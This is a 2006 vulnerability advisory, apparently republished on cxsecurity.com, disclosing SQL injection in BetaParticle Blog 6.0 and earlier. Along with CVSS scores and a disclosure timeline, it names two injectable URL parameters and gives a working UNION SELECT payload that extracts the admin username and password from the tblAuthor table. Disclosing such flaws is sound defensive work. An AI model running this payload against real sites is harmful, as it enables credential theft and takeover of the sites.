BetaParticle Blog <= 6.0 Multiple Remote SQL InjectionVulnerabilities

2006.03.20
Credit: nukedx
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

--Security Report-- Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 18/03/06 05:27 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: BetaParticle (http://www.betaparticle.com/) Version: 6.0 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL query. Level: Critical --- How&Example: GET -> http://[site]/bpdir/template_permalink.asp?id=[SQLQuery] GET -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery] Example -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SE LECT+null,fldAuthorUsername ,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1 With this example remote attacker could get admin's pass and can login from /main.asp -- Timeline: * 18/03/2006: Vulnerability found. * 18/03/2006: Contacted with vendor and waiting reply. --- Exploit: Click here and get exploit for this advisory ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top